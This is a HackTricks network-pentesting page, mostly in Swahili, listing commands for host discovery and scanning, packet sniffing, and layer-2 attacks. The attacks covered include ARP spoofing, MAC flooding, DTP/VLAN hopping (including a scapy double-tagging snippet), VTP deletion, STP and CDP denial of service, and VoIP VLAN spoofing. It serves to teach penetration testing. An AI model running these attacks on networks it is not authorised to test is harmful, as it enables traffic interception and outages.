hacktricks/generic-methodologies-and-resources/pentesting-network
2024-07-29 11:05:35 +00:00
..
dhcpv6.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
eigrp-attacks.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
glbp-and-hsrp-attacks.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
ids-evasion.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
lateral-vlan-segmentation-bypass.md Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:50:00 +00:00
network-protocols-explained-esp.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
nmap-summary-esp.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
pentesting-ipv6.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
README.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:14:33 +00:00
spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:37:42 +00:00
spoofing-ssdp-and-upnp-devices.md Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:50:00 +00:00
webrtc-dos.md Translated ['generic-methodologies-and-resources/pentesting-network/webr 2024-07-29 11:05:35 +00:00

Pentesting Network

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}


Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Kugundua mwenyeji kutoka nje

Hii itakuwa sehemu fupi kuhusu jinsi ya kupata IPs zinazojibu kutoka kwa Mtandao.
Katika hali hii una mipango ya IPs (labda hata mifumo kadhaa) na unahitaji tu kupata IPs zipi zinazojibu.

ICMP

Hii ndiyo njia rahisi na ya haraka kugundua ikiwa mwenyeji yupo au la.
Unaweza kujaribu kutuma baadhi ya ICMP pakiti na kusubiri majibu. Njia rahisi ni kutuma tu ombio la echo na kusubiri majibu. Unaweza kufanya hivyo kwa kutumia ping rahisi au kutumia fping kwa mifumo.
Unaweza pia kutumia nmap kutuma aina nyingine za pakiti za ICMP (hii itakuepusha na filters za kawaida za ombi-jibu la ICMP echo).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCP Port Discovery

Ni kawaida sana kukuta kwamba aina zote za pakiti za ICMP zinachujwa. Hivyo, unachoweza kufanya ili kuangalia kama mwenyeji yuko hewani ni kujaribu kupata bandari zilizo wazi. Kila mwenyeji ana 65535 bandari, hivyo, ikiwa una "wigo mkubwa" huwezi kujaribu kama kila bandari ya kila mwenyeji iko wazi au la, hiyo itachukua muda mwingi.
Hivyo, unachohitaji ni scanner ya bandari ya haraka (masscan) na orodha ya bandari zinazotumika zaidi:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

You could also perform this step with nmap, but it slower and somewhat nmap has problems identifying hosts up.

HTTP Port Discovery

Hii ni ugunduzi wa bandari ya TCP inayofaa unapotaka kuzingatia kugundua HTTP huduma:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDP Port Discovery

Unaweza pia kujaribu kuangalia baadhi ya UDP port open ili uamue kama unapaswa kuzingatia zaidi host. Kwa kuwa huduma za UDP kawaida hazijibu na data yoyote kwa pakiti ya kawaida ya UDP isiyo na maudhui, ni vigumu kusema kama bandari inachujwa au iko wazi. Njia rahisi ya kuamua hili ni kutuma pakiti inayohusiana na huduma inayotumika, na kwa kuwa hujui ni huduma ipi inayotumika, unapaswa kujaribu ile inayowezekana zaidi kulingana na nambari ya bandari:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Laini la nmap lililopendekezwa hapo awali litajaribu bandari 1000 za UDP katika kila mwenyeji ndani ya /24 anuwai lakini hata hii itachukua tu >20min. Ikiwa unahitaji matokeo ya haraka unaweza kutumia udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Hii itatuma UDP probes hizi kwa bandari zao zinazotarajiwa (kwa anuwai ya /24 hii itachukua tu dakika 1): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

Ugunduzi wa Bandari za SCTP

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Pentesting Wifi

Hapa unaweza kupata mwongozo mzuri wa mashambulizi yote maarufu ya Wifi wakati wa uandishi huu:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Kugundua mwenyeji kutoka ndani

Ikiwa uko ndani ya mtandao, moja ya mambo ya kwanza unayotaka kufanya ni kugundua wenyeji wengine. Kulingana na kiasi cha kelele unachoweza/unataka kufanya, hatua tofauti zinaweza kuchukuliwa:

Passive

Unaweza kutumia zana hizi kugundua wenyeji kwa pasivu ndani ya mtandao uliounganishwa:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Active

Kumbuka kwamba mbinu zilizozungumziwa katika Kugundua mwenyeji kutoka nje (TCP/HTTP/UDP/SCTP Port Discovery) zinaweza pia kutumika hapa.
Lakini, kwani uko katika mtandao huo huo na wenyeji wengine, unaweza kufanya mambo zaidi:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Kumbuka kwamba mbinu zilizozungumziwa katika Discovering hosts from the outside (ICMP) zinaweza pia kutumika hapa.
Lakini, kwa kuwa uko katika mtandao mmoja na wenyeji wengine, unaweza kufanya mambo zaidi:

  • Ikiwa unafanya ping kwenye anwani ya matangazo ya subnet, ping inapaswa kufika kwa kila mwenyeji na wanaweza kujibu wewe: ping -b 10.10.5.255
  • Kufanya ping kwenye anwani ya matangazo ya mtandao unaweza hata kupata wenyeji ndani ya subnets nyingine: ping -b 255.255.255.255
  • Tumia lippu -PE, -PP, -PM za nmap kufanya ugunduzi wa wenyeji kwa kutuma kwa mtiririko wa ICMPv4 echo, timestamp, na maombi ya subnet mask: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan inatumika kuwasha kompyuta kupitia ujumbe wa mtandao. Pakiti ya kichawi inayotumika kuwasha kompyuta ni pakiti tu ambapo MAC Dst inatolewa na kisha inarudiwa mara 16 ndani ya pakiti hiyo hiyo.
Kisha aina hii ya pakiti kawaida hutumwa katika ethernet 0x0842 au katika pakiti ya UDP kwa bandari 9.
Ikiwa hakuna [MAC] inatolewa, pakiti inatumwa kwa broadcast ethernet (na MAC ya matangazo itakuwa ile inayorudiwa).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Skanningi ya Wenyeji

Mara tu unapogundua IP zote (za nje au za ndani) unazotaka kuskania kwa undani, hatua tofauti zinaweza kufanywa.

TCP

  • Bandari iliyo funguliwa: SYN --> SYN/ACK --> RST
  • Bandari iliyo fungwa: SYN --> RST/ACK
  • Bandari iliyo chujwa: SYN --> [HAUNA JIBU]
  • Bandari iliyo chujwa: SYN --> ujumbe wa ICMP
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

Kuna chaguzi 2 za kuchunguza bandari ya UDP:

  • Tuma UDP packet na angalia majibu ICMP unreachable ikiwa bandari ime fungwa (katika kesi kadhaa ICMP itachujwa hivyo hutapokea taarifa yoyote ikiwa bandari imefungwa au wazi).
  • Tuma formatted datagrams ili kupata majibu kutoka kwa service (mfano, DNS, DHCP, TFTP, na wengine, kama ilivyoorodheshwa katika nmap-payloads). Ikiwa unapokea majibu, basi, bandari iko wazi.

Nmap itachanganya chaguzi zote mbili kwa kutumia "-sV" (uchunguzi wa UDP ni polepole sana), lakini zingatia kwamba uchunguzi wa UDP ni polepole zaidi kuliko uchunguzi wa TCP:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP Scan

SCTP (Stream Control Transmission Protocol) imeundwa kutumika pamoja na TCP (Transmission Control Protocol) na UDP (User Datagram Protocol). Kusudi lake kuu ni kuwezesha usafirishaji wa data za simu kupitia mitandao ya IP, ikionyesha sifa nyingi za kuaminika zinazopatikana katika Signaling System 7 (SS7). SCTP ni sehemu muhimu ya familia ya protokali ya SIGTRAN, ambayo inalenga kusafirisha ishara za SS7 kupitia mitandao ya IP.

Msaada kwa SCTP unapatikana kutoka kwa mifumo mbalimbali ya uendeshaji, kama vile IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, na VxWorks, ikionyesha kukubalika kwake pana na matumizi katika uwanja wa mawasiliano na mitandao.

Nmap inatoa scans mbili tofauti za SCTP: -sY na -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS and IPS evasion

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

More nmap options

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

Kufichua Anwani za IP za Ndani

Router, firewalls, na vifaa vya mtandao vilivyopangwa vibaya wakati mwingine vinajibu kwa uchunguzi wa mtandao kwa kutumia anwani za chanzo zisizo za umma. tcpdump inaweza kutumika kubaini pakiti zinazopokelewa kutoka kwa anwani za kibinafsi wakati wa majaribio. Kwa haswa, kwenye Kali Linux, pakiti zinaweza kukamatwa kwenye eth2 interface, ambayo inapatikana kutoka kwa Mtandao wa umma. Ni muhimu kutambua kwamba ikiwa mipangilio yako iko nyuma ya NAT au Firewall, pakiti kama hizo zinaweza kuchujwa.

tcpdump nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Sniffing

Kupitia sniffing unaweza kujifunza maelezo ya anuwai za IP, ukubwa wa subnet, anwani za MAC, na majina ya mwenyeji kwa kupitia muhtasari wa fremu na pakiti zilizokamatwa. Ikiwa mtandao umewekwa vibaya au kitambaa cha kubadili kiko chini ya shinikizo, washambuliaji wanaweza kukamata nyenzo nyeti kupitia sniffing ya mtandao isiyo ya moja kwa moja.

Ikiwa mtandao wa Ethernet ulio na kubadili umewekwa vizuri, utaona tu fremu za matangazo na nyenzo zinazokusudiwa kwa anwani yako ya MAC.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Mtu anaweza pia kukamata pakiti kutoka kwa mashine ya mbali kupitia kikao cha SSH kwa kutumia Wireshark kama GUI katika wakati halisi.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Kwa wazi.

Capturing credentials

Unaweza kutumia zana kama https://github.com/lgandx/PCredz kuchambua akiba kutoka kwa pcap au kiolesura cha moja kwa moja.

LAN attacks

ARP spoofing

ARP Spoofing inajumuisha kutuma ARPResponses za bure kuashiria kwamba IP ya mashine ina MAC ya kifaa chetu. Kisha, mwathirika atabadilisha jedwali la ARP na atawasiliana na mashine yetu kila wakati anapotaka kuwasiliana na IP iliyopotoshwa.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC Flooding - CAM overflow

Mwagilia meza ya CAM ya swichi kwa kutuma pakiti nyingi zenye anwani tofauti za mac. Wakati meza ya CAM imejaa, swichi inaanza kujiendesha kama hub (ikitoa matangazo ya trafiki yote).

macof -i <interface>

In modern switches this vulnerability has been fixed.

802.1Q VLAN / DTP Attacks

Dynamic Trunking

The Dynamic Trunking Protocol (DTP) imeundwa kama itifaki ya kiwango cha kiungo ili kuwezesha mfumo wa kiotomatiki wa trunking, ikiruhusu swichi kuchagua porti kiotomatiki kwa ajili ya hali ya trunk (Trunk) au hali isiyo ya trunk. Utekelezaji wa DTP mara nyingi huonekana kama ishara ya muundo wa mtandao usio bora, ikisisitiza umuhimu wa kuweka trunks kwa mikono tu pale inavyohitajika na kuhakikisha kuwa kuna nyaraka sahihi.

Kwa kawaida, porti za swichi zimewekwa kufanya kazi katika hali ya Dynamic Auto, ikimaanisha ziko tayari kuanzisha trunking ikiwa itasababishwa na swichi jirani. Wasiwasi wa usalama unatokea wakati pentester au mshambuliaji anapounganisha na swichi na kutuma fremu ya DTP Desirable, ikilazimisha porti kuingia katika hali ya trunk. Kitendo hiki kinamwezesha mshambuliaji kuhesabu VLANs kupitia uchambuzi wa fremu za STP na kupita segmentation ya VLAN kwa kuanzisha interfaces za virtual.

Uwepo wa DTP katika swichi nyingi kwa kawaida unaweza kutumika na maadui kuiga tabia ya swichi, hivyo kupata ufikiaji wa trafiki katika VLAN zote. Skripti dtpscan.sh inatumika kufuatilia interface, ikifunua ikiwa swichi iko katika hali ya Default, Trunk, Dynamic, Auto, au Access—hali ya mwisho ikiwa ndio pekee iliyohakikishiwa dhidi ya mashambulizi ya VLAN hopping. Chombo hiki kinakadiria hali ya udhaifu wa swichi.

Iwapo udhaifu wa mtandao utagundulika, chombo Yersinia kinaweza kutumika "kuwezesha trunking" kupitia itifaki ya DTP, ikiruhusu kuangalia pakiti kutoka VLAN zote.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Ili kuhesabu VLANs, pia inawezekana kuzalisha fremu ya DTP Desirable kwa kutumia script DTPHijacking.py**. Usikatishe script hiyo kwa hali yoyote. Inachoma DTP Desirable kila sekunde tatu. Makanali ya trunk iliyoundwa kwa njia ya kidinamikia kwenye swichi inaishi kwa dakika tano tu. Baada ya dakika tano, trunk inanguka.

sudo python3 DTPHijacking.py --interface eth0

Ningependa kuonyesha kwamba Access/Desirable (0x03) inaonyesha kwamba fremu ya DTP ni ya aina ya Desirable, ambayo inamwambia bandari ibadilike kuwa katika hali ya Trunk. Na 802.1Q/802.1Q (0xa5) inaonyesha aina ya encapsulation ya 802.1Q.

Kwa kuchambua fremu za STP, tunajifunza kuhusu uwepo wa VLAN 30 na VLAN 60.

Kushambulia VLAN maalum

Mara tu unavyojua IDs za VLAN na thamani za IP, unaweza kuunda kiunganishi cha virtual ili kushambulia VLAN maalum.
Ikiwa DHCP haipatikani, basi tumia ifconfig kuweka anwani ya IP ya kudumu.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Shambulio lililozungumziwa la Dynamic Trunking na kuunda interfaces za virtual na kugundua wenyeji ndani ya VLAN nyingine linafanywa kiotomatiki na chombo: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

Ikiwa mshambuliaji anajua thamani ya MAC, IP na VLAN ID ya mwenyeji wa kuteseka, anaweza kujaribu kugonga mara mbili fremu na VLAN yake iliyoteuliwa na VLAN ya kuteseka na kutuma pakiti. Kwa kuwa mwenyeji wa kuteseka hataweza kuungana tena na mshambuliaji, hivyo chaguo bora kwa mshambuliaji ni kuwasiliana kupitia UDP kwa protokali ambazo zinaweza kufanya vitendo vya kuvutia (kama SNMP).

Chaguo lingine kwa mshambuliaji ni kuzindua TCP port scan ikijifanya kuwa IP inayodhibitiwa na mshambuliaji na inayoweza kufikiwa na kuteseka (labda kupitia intaneti). Kisha, mshambuliaji anaweza kunusa katika mwenyeji wa pili aliye na yeye ikiwa inapokea baadhi ya pakiti kutoka kwa kuteseka.

Ili kufanya shambulio hili unaweza kutumia scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Ikiwa una ufikiaji wa swichi ambayo umeunganishwa moja kwa moja, una uwezo wa kuzidi segmentation ya VLAN ndani ya mtandao. Rahisi tu badilisha bandari kuwa katika hali ya trunk (inayojulikana pia kama trunk), tengeneza interfaces za virtual zikiwa na IDs za VLAN zinazolengwa, na uweke anwani ya IP. Unaweza kujaribu kuomba anwani hiyo kwa njia ya kidinamik (DHCP) au unaweza kuipanga kwa njia ya statiki. Inategemea hali.

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Layer 3 Private VLAN Bypass

Katika mazingira fulani, kama vile mitandao ya wireless ya wageni, mipangilio ya port isolation (inayojulikana pia kama private VLAN) inatekelezwa ili kuzuia wateja waliounganishwa na pointi za ufikiaji wa wireless kuwasiliana moja kwa moja. Hata hivyo, mbinu imegundulika ambayo inaweza kupita hatua hizi za kutengwa. Mbinu hii inatumia ama ukosefu wa ACL za mtandao au mipangilio yao isiyo sahihi, ikiruhusu pakiti za IP kupitishwa kupitia router ili kufikia mteja mwingine kwenye mtandao huo huo.

Shambulio linafanywa kwa kuunda pakiti inayobeba anwani ya IP ya mteja wa marudio lakini ikiwa na anwani ya MAC ya router. Hii inasababisha router kupeleka pakiti hiyo kwa makosa kwa mteja wa lengo. Njia hii ni sawa na ile inayotumika katika Shambulio za Double Tagging, ambapo uwezo wa kudhibiti mwenyeji anayepatikana kwa mwathirika unatumika kutekeleza kasoro ya usalama.

Hatua Muhimu za Shambulio:

  1. Kuunda Pakiti: Pakiti inaundwa kwa njia maalum ili kujumuisha anwani ya IP ya mteja wa lengo lakini ikiwa na anwani ya MAC ya router.
  2. Kutatua Tabia ya Router: Pakiti iliyoundwa inatumwa kwa router, ambayo, kutokana na mipangilio, inapeleka pakiti hiyo kwa mteja wa lengo, ikipita kutengwa kunakotolewa na mipangilio ya private VLAN.

VTP Attacks

VTP (VLAN Trunking Protocol) inakusanya usimamizi wa VLAN. Inatumia nambari za marekebisho kudumisha uaminifu wa hifadhidata ya VLAN; mabadiliko yoyote huongeza nambari hii. Swichi zinachukua mipangilio yenye nambari za marekebisho za juu, zikisasisha hifadhidata zao za VLAN.

VTP Domain Roles

  • VTP Server: Inasimamia VLANs—inaunda, inafuta, inabadilisha. Inatangaza matangazo ya VTP kwa wanachama wa eneo.
  • VTP Client: Inapokea matangazo ya VTP ili kuunganisha hifadhidata yake ya VLAN. Jukumu hili haliruhusiwi kufanya mabadiliko ya mipangilio ya VLAN za ndani.
  • VTP Transparent: Hailihusishi katika masasisho ya VTP lakini inapeleka matangazo ya VTP. Haijaguswa na shambulio za VTP, inashikilia nambari ya marekebisho isiyobadilika ya sifuri.

VTP Advertisement Types

  • Summary Advertisement: Inatangazwa na VTP server kila sekunde 300, ikibeba taarifa muhimu za eneo.
  • Subset Advertisement: Inatumwa kufuatia mabadiliko ya mipangilio ya VLAN.
  • Advertisement Request: Inatolewa na VTP client kuomba Summary Advertisement, kawaida kama jibu la kugundua nambari ya marekebisho ya mipangilio ya juu.

Uhalifu wa VTP unaweza kutumika pekee kupitia bandari za trunk kwani matangazo ya VTP yanazunguka kupitia hizo pekee. Baada ya hali za shambulio la DTP, huenda zikageukia VTP. Zana kama Yersinia zinaweza kusaidia shambulio za VTP, zikilenga kufuta hifadhidata ya VLAN, kwa ufanisi kuharibu mtandao.

Kumbuka: Majadiliano haya yanahusiana na toleo la VTP 1 (VTPv1).

%% yersinia -G # Launch Yersinia in graphical mode ```

Katika hali ya picha ya Yersinia, chagua chaguo la kufuta VTP vlans zote ili kufuta hifadhidata ya VLAN.

STP Mashambulizi

Ikiwa huwezi kunasa fremu za BPDU kwenye interfaces zako, ni vigumu kwamba utafanikiwa katika shambulio la STP.

STP BPDU DoS

Kutuma BPDUs nyingi TCP (Notification ya Mabadiliko ya Topolojia) au Conf (BPDUs ambazo zinatumwa wakati topolojia inaundwa) swichi zinachanganyikiwa na kuacha kufanya kazi vizuri.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Wakati TCP inatumwa, jedwali la CAM la swichi litafutwa ndani ya sekunde 15. Kisha, ikiwa unatumia pakiti hizi kwa kuendelea, jedwali la CAM litaanzishwa upya mara kwa mara (au kila sekunde 15) na wakati linapaanzishwa upya, swichi inafanya kazi kama hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Mshambuliaji anasimulia tabia ya swichi ili kuwa mzizi wa STP wa mtandao. Kisha, data zaidi itapita kupitia kwake. Hii ni ya kuvutia unapokuwa umeunganishwa na swichi mbili tofauti.
Hii inafanywa kwa kutuma vifurushi vya BPDUs CONF vinavyosema kwamba thamani ya kipaumbele ni ndogo kuliko kipaumbele halisi cha swichi halisi ya mzizi.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Ikiwa mshambuliaji ameunganishwa na swichi 2 anaweza kuwa mzizi wa mti mpya na trafiki yote kati ya swichi hizo itapita kupitia yeye (shambulio la MITM litafanywa).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Attacks

CISCO Discovery Protocol (CDP) ni muhimu kwa mawasiliano kati ya vifaa vya CISCO, ikiruhusu kuvitambua na kushiriki maelezo ya usanidi.

Passive Data Collection

CDP imewekwa kutangaza habari kupitia bandari zote, ambayo inaweza kusababisha hatari ya usalama. Mshambuliaji, anapounganisha kwenye bandari ya swichi, anaweza kutumia waandishi wa mtandao kama Wireshark, tcpdump, au Yersinia. Kitendo hiki kinaweza kufichua data nyeti kuhusu kifaa cha mtandao, ikiwa ni pamoja na mfano wake na toleo la Cisco IOS inayotumia. Mshambuliaji anaweza kisha kulenga udhaifu maalum katika toleo lililotambuliwa la Cisco IOS.

Inducing CDP Table Flooding

Njia yenye nguvu zaidi inahusisha kuzindua shambulio la Denial of Service (DoS) kwa kujaa kumbukumbu ya swichi, ikijifanya kuwa vifaa halali vya CISCO. Hapa chini kuna mfuatano wa amri za kuanzisha shambulio kama hilo kwa kutumia Yersinia, chombo cha mtandao kilichoundwa kwa ajili ya majaribio:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Wakati wa shambulio hili, CPU ya switch na jedwali la majirani wa CDP yanakabiliwa na mzigo mzito, na kusababisha kile kinachojulikana mara nyingi kama “kufeli kwa mtandao” kutokana na matumizi makubwa ya rasilimali.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

You could also use scapy. Be sure to install it with scapy/contrib package.

VoIP Attacks and the VoIP Hopper Tool

VoIP simu, ambazo zinaunganishwa zaidi na vifaa vya IoT, zinatoa kazi kama kufungua milango au kudhibiti thermostats kupitia nambari maalum za simu. Hata hivyo, muunganisho huu unaweza kuleta hatari za usalama.

The tool voiphopper is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP.

VoIP Hopper offers three modes for the Cisco Discovery Protocol (CDP):

  1. Sniff Mode (-c 0): Analyzes network packets to identify the VLAN ID.
  2. Spoof Mode (-c 1): Generates custom packets mimicking those of an actual VoIP device.
  3. Spoof with Pre-made Packet Mode (-c 2): Sends packets identical to those of a specific Cisco IP phone model.

The preferred mode for speed is the third one. It requires specifying:

  • The attacker's network interface (-i parameter).
  • The name of the VoIP device being emulated (-E parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address).

In corporate settings, to mimic an existing VoIP device, one might:

  • Inspect the MAC label on the phone.
  • Navigate the phone's display settings to view model information.
  • Connect the VoIP device to a laptop and observe CDP requests using Wireshark.

An example command to execute the tool in the third mode would be:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Mashambulizi

Uhesabu

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Aina mbili za DoS zinaweza kufanywa dhidi ya seva za DHCP. Ya kwanza inajumuisha kuiga wenyeji wa uwongo wa kutosha kutumia anwani zote zinazowezekana za IP.
